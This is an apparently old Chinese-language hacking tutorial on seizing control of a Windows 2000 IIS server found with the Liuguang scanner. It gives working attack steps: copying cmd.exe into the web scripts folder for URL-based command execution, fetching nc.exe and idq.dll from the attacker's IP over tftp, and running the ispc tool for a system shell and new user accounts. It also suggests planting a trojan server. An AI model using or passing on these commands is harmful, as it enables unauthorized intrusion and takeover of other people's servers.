鸟入侵之用iis远程命令取得系统控制权
| 作者:永恒国度 标签:黑客 | 阅读次数:126 |
   |
|    | ||||
|
用流光扫描到的黑色主机(什么是黑色主机,请参见流光帮助),可以利用iis远程
命令取得系统控制权! 除了流光外,还需要snake的ispc(IIS权限提升工具,还没有的可到我的主页下载) 和tftp32。 用鼠标单击黑色主机-》连接,出现iis远程命令行工具,然后执行如下命令: copy c:\wint\system32\cmd.exe c:\inetpub\scripts\fuck.exe 此时在浏览器中输入: http://192.168.0.1/scripts/fuck.exe?/c+dir+c:\ 如果返回对方c:\目录!那么就可以搞定了! 接下来可以有如下方法: 1、把nc.exe拷贝上去执行: http://192.168.0.1/scripts/fuck.exe?/c+tftp -i 你的IP GET nc.exe c:\\inetpub\\scripts\\nc.exe http://192.168.0.1/scripts/fuck.exe?/c+c:\inetpub\scripts\nc.exe(执行nc) 此时可以telnet到99,但添加用户的时候很显然权限不够! 2、拷贝冰河服务端上去执行,然后………… 在这里我们不用以上方法。 首先在iis远程命令行中输入 dir c:\idq.dll/s 如果找到文件就 copy c:\……\idq.dll c:\inetpub\scripts 如果没有找到,直接 运行tftp32把idq.dll上传,在浏览器中上传 http://192.168.0.1/scripts/fuck.exe?/c+tftp -i 你的IP GET idq.dll c:\\inetpub\\scripts\\idq.dll 成功后运行ispc.exe ispc 192.168.0.1/scripts/idq.dll 接着出现 Start to connect to the server... We Got It! Please Press Some <Return> to Enter Shell.... Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> 哈哈进来了!@这就可以添加用户了!然后就随便你了! |
浙ICP备06020153号-1